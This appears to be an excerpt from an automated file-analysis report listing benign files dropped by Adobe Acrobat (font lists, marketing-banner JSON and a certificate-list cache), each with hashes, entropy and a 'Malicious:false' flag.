                      Preview:p...... .............g..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):1233
                      Entropy (8bit):5.233980037532449
                      Encrypted:false
                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):1233
                      Entropy (8bit):5.233980037532449
                      Encrypted:false
                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):1233
                      Entropy (8bit):5.233980037532449
                      Encrypted:false
                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):10880
                      Entropy (8bit):5.214360287289079
                      Encrypted:false
                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                      MD5:B60EE534029885BD6DECA42D1263BDC0
                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):10880
                      Entropy (8bit):5.214360287289079
                      Encrypted:false
                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                      MD5:B60EE534029885BD6DECA42D1263BDC0
                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):295
                      Entropy (8bit):5.309610314063338
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJM3g98kUwPeUkwRe9:YvXKXDDI+KW5YpW76VeGMbLUkee9
                      MD5:53DDF6A374AFBD4B3D282AD86B0E37B3
                      SHA1:870469E86CD83D53FCFF8F5E476B1837ED4D906E
                      SHA-256:728A7E7B6755610D4BD8F3CB57907AC98388F96338A2670B1AAAAEACEB883480
                      SHA-512:6BA2693E04931596A1B149ED6F9B72558B0D46BB2FC7ADD2C9852D75584AE5668E0E0E615CA371057750D362DA4940C29ACE7F7E2095904AFDC120965FC5112F
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.249555671606703
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfBoTfXpnrPeUkwRe9:YvXKXDDI+KW5YpW76VeGWTfXcUkee9
                      MD5:8C53FE437B7CD93BEB7EA20504439E70
                      SHA1:234ED94ABC90945B56562E45CA32A058C664CDE3
                      SHA-256:64B6B6D444659D32134D4AC0EA610693EBC770ED66DF44209D637F0431DF796D
                      SHA-512:7EF06B99C47EDEE8E20A14527E6B8C484989CE2E52FF6B4C6386B5BE5FCFAE8063AC26212C9ED880D74402EB796965DD643ABF28CDEBA9437576E59C2CBC000A
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.228550707001778
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfBD2G6UpnrPeUkwRe9:YvXKXDDI+KW5YpW76VeGR22cUkee9
                      MD5:6BFE26C6F051EC07DB60513796777117
                      SHA1:B105E760C1C39D42C1753E7E84C5BF741743545A
                      SHA-256:AC3B1E31ABB5906630A726373D25C1150094DDD991C0E5584EA0240150809BC9
                      SHA-512:5990189343C787089A2026D13DCA2EF499A8528B84820EB12DF95B97E357DF941B82B2D59FF546F9344CE714A401492749C581ACE7692AB1EF043CDDB3DF852C
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):285
                      Entropy (8bit):5.286617119006612
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfPmwrPeUkwRe9:YvXKXDDI+KW5YpW76VeGH56Ukee9
                      MD5:B7C9DA40B57B2A96CB98A72E0E2783E3
                      SHA1:120C18B242123552F7E6FB29F9F2E5E98A78E434
                      SHA-256:A39D5B26E6F2D9FD44FF152695E6BF1C7DF7D77E7820382272D878BD472CE620
                      SHA-512:E99AF2B8256D8FACFDD3C230F89D10EE8E8DCE61C0403844E001D35F8F0D682D910CA938650E835DE1F7CF745B467FE5307DB12D041D3411A9991634022AD445
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1123
                      Entropy (8bit):5.683320566856438
                      Encrypted:false
                      SSDEEP:24:Yv6XDDGligpLgE9cQx8LennAvzBvkn0RCmK8czOCCSU:YvOGMghgy6SAFv5Ah8cv/U
                      MD5:4F597AD4559926B0A1A8958A76C5A153
                      SHA1:58C5C244C351C2DC9119F866A3FE22C51F20FF0D
                      SHA-256:4F91AB29B743C916D6A2D166486E41041459C60FD8365536439FB4B325C83D28
                      SHA-512:164412A95FC3B2BD24AE19F8B008B681B179C1D448856F7B775F5719FC891DA181995DC41679B02653A49993489E5B4046ED24F10E00A1EA1CE459E180001FE5
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):289
                      Entropy (8bit):5.232529532691426
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJf8dPeUkwRe9:YvXKXDDI+KW5YpW76VeGU8Ukee9
                      MD5:DC4CAAE49CD1A6465BC1CCBF312F8E86
                      SHA1:B3B5A5E2962DEC4A0A2B2803D7A305143BFCC03F
                      SHA-256:AEDF48A94742DE6D107327BBFEA37172135C372EB910408556D12875D5480792
                      SHA-512:DBC8D8637393376D29C6470FAA1378D0EFDDE60B3B8BF282489CC410B48AEE9F82B51447123CC9CEDB7BD491BF49F5ED9B815362DAD4FCC0A1EFC60B48A03D90
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):292
                      Entropy (8bit):5.234486921237345
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfQ1rPeUkwRe9:YvXKXDDI+KW5YpW76VeGY16Ukee9
                      MD5:9EDB6F7DDE1805EE2762B8EFE5BEB3B8
                      SHA1:5A7496B9267559EA8DF0511977BA1F890737606F
                      SHA-256:5736B2CCC705DC20DC9B501705E69D398482C20C82F482FC4916BF59A03464E4
                      SHA-512:10E8CFA2BD230BA41F00F5AA9CDC2370AEB3D6BC46E47A3B51145D3057EFD3BEFEB91AD272AB0F8F9A9C8BE376CD1D76E06400FC929B5E1B3760C44F78241FD5
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):289
                      Entropy (8bit):5.253551723835039
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfFldPeUkwRe9:YvXKXDDI+KW5YpW76VeGz8Ukee9
                      MD5:0D17A954F909287757BD6A400CA9C1CF
                      SHA1:C394E0F152B25FBB6B765C2656422C607BA7ACF8
                      SHA-256:C6E4FAC2C1AB41841BE4EA8C855D78E345915E7A5398E6BF01C52C86D3D66667
                      SHA-512:5BD77E0A5077434E66A5B9240FFA1806B9710270828E81B293AB5B8152011FF4EDCF506F33F10ADC7014255F151BDDD942E8032E6ABA95F8CE8462AB9D443A79
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):295
                      Entropy (8bit):5.260306546338378
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfzdPeUkwRe9:YvXKXDDI+KW5YpW76VeGb8Ukee9
                      MD5:DA6B7A5337B3DF425F7296220B14B77F
                      SHA1:B71ABBE60C26F4D06F5D388BC26C0BFC14BE7B70
                      SHA-256:CEE66E57F14EA977ED61DF7C693F690A2ADCD0BB7AC06E5C9F8E261344EA53A6
                      SHA-512:A7C091A3D7EE4558ABDFB98791CC8F7474A43022E13E4625B74248788F994176A8B174EACE93A34CC6268132E3E8C2CCD7FC38B2CA3918804206FDBBBB95D015
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):289
                      Entropy (8bit):5.240001668202997
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfYdPeUkwRe9:YvXKXDDI+KW5YpW76VeGg8Ukee9
                      MD5:92DD829F2E2C99CD47C606ED37913E8A
                      SHA1:708A7A67645443FDDB1263B990BB64E0535E8895
                      SHA-256:63785225A7AE97778F18D7205154BF273C961AA18CF984553F1D6A6893272C63
                      SHA-512:7C16C85CDE6D46DE9A4387CC7C74C6ED474F59C7019E5DCFB2A0CA00A845A6F08CE34C6EC7979A5EE40EEE8488DFBA342D295B574BECC77BD2F70E1924D3A00F
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):284
                      Entropy (8bit):5.2252947232951135
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJf+dPeUkwRe9:YvXKXDDI+KW5YpW76VeG28Ukee9
                      MD5:873D567403A3532B14F1463367FF8175
                      SHA1:2DAC17ADE1A65321A50F96C08FEDC15CE39D20FD
                      SHA-256:6E65FC651F6920BAEEE119E50295F0CB646EDAF446FA3DFB294E1E3B30C0E36A
                      SHA-512:32F026B389E470507CCAD5B0FED8DD93854AC3AB5798CBED12EFD4473A4EE309F0C465991603D51FFAF4AB0B18CA9D290691FC56EF4FBD937BA1CD59290E51B9
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):291
                      Entropy (8bit):5.223961125545569
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfbPtdPeUkwRe9:YvXKXDDI+KW5YpW76VeGDV8Ukee9
                      MD5:BE34134A7FD168691BF4E83B7D1C0B8C
                      SHA1:8C5BF19636E679EC867FB8BE8D22AC8E44086AEC
                      SHA-256:0472788129D8F0EB7611C4EA6E68558574466AA0515AEEB1DFD871B3C3952F92
                      SHA-512:E011E50418530209804208A0EC0E3D17E06FD3B131477D6ACCCE68879788A9E1914BA88E321E5DE97149D13EC764CC57F229C8D076452F7610749BEA1A343B78
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):287
                      Entropy (8bit):5.225099743905361
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJf21rPeUkwRe9:YvXKXDDI+KW5YpW76VeG+16Ukee9
                      MD5:5D621CAD8936DFB2A13A431E8EDDF988
                      SHA1:F224629503EDA57503CFE3968C881FC2F073CBF1
                      SHA-256:153AAED0E303B56B3F880C465BA63A4236467BD01A30F31C44B5375F7FB96228
                      SHA-512:8F611F9CFB5FA1D1321543266F50E068AB0673477CF52AE0ED0D9B1BC5E5F391CD61B11D27A717B0FF218B2CC67564AC2D04168C7F5ADFD3DCC97A2E03540D5A
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1090
                      Entropy (8bit):5.654325238097656
                      Encrypted:false
                      SSDEEP:24:Yv6XDDGliEamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSn:YvOGMCBgkDMUJUAh8cvMn
                      MD5:C75058147E6F00F45D1F1BA506125966
                      SHA1:A9E5F2484E28C378EBE2988907278911C2A51691
                      SHA-256:A437000EAD7A72AC464D3EA3816D61B25E348D062BCDA4591FE1AFFC3B72BAC1
                      SHA-512:D8A871D81515D67EA3BBA031F4ADF4E1F1D5C054555F0EB30B2F43C3207C1C691C862348A9ED5D607FD22CEC525E3C7F23D0A8391115E6FE3903452AD392EAFE
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):286
                      Entropy (8bit):5.200223564606673
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfshHHrPeUkwRe9:YvXKXDDI+KW5YpW76VeGUUUkee9
                      MD5:608193D061AF9043224249989DC78B8B
                      SHA1:06BBE359E4629F0B2F3C2BDBB98528E539825540
                      SHA-256:E94C9E5EEA81629ACC3A7644AE9B6068B5E285205EA20F8D488E8A32C10D3C33
